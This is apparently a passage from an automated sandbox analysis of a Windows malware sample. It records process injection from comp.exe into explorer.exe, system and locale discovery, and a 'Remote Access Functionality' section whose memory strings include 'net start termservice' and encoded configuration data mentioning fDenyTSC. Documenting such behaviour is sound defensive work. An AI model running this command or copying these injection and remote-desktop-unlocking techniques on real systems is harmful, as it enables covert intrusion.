Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 907008	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 319D008	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3144008	Jump to behavior

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Process created: C:\Windows\SysWOW64\comp.exe C:\Windows\SysWOW64\comp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Binary or memory string: Shell_TrayWndtooltips_class32U

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F0A37F cpuid

12_2_02F0A37F

Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	12_2_02F2222E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_02F22354
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	12_2_02F2245A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	12_2_02F1842E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_02F22529
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	12_2_02F21BC8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	12_2_02F21EB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	12_2_02F21E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_02F21FDB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	12_2_02F21F50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	12_2_02F17F0C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	12_2_02F21DC3

Source: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d2d22b7a VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dcbc2b90 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dc28f109 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EEE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

12_2_02EEE8D0

Source: C:\Windows\SysWOW64\explorer.exe

12_2_02EE61F0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02F1E6D1 _free,GetTimeZoneInformation,_free,

12_2_02F1E6D1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 12_2_02EE91B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,

12_2_02EE91B0

Remote Access Functionality

Contains functionality to start a terminal service

Source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: comp.exe, 00000002.00000002.1650280495.0000000005970000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: comp.exe, 00000008.00000002.1719784982.0000000005820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: comp.exe, 0000000A.00000002.1787365000.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: explorer.exe	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
Source: explorer.exe, 0000000D.00000002.1719815362.0000000000960000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000D.00000002.1719815362.0000000000960000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 